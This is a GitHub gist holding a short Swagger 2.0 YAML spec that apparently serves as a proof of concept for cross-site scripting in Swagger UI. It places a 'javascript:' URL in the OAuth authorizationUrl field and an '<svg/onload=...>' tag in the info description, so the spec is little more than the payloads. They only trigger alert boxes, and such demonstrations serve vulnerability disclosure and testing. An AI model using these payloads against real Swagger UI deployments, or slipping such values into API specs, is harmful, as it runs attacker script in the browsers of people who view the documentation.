Skip to content

Instantly share code, notes, and snippets.

@vortexau
Last active July 5, 2021 07:25
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save vortexau/b438138e24bb3dd4592437ea347d90df to your computer and use it in GitHub Desktop.
Save vortexau/b438138e24bb3dd4592437ea347d90df to your computer and use it in GitHub Desktop.
swagger: '2.0'
securityDefinitions:
a:
type: oauth2
authorizationUrl: javascript:alert(document.domain)//
info:
version: "0.0.1"
title: Swagger UI
description: "<svg/onload=alert(1)"
paths:
/:
get:
responses:
200:
description: Successful respons
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment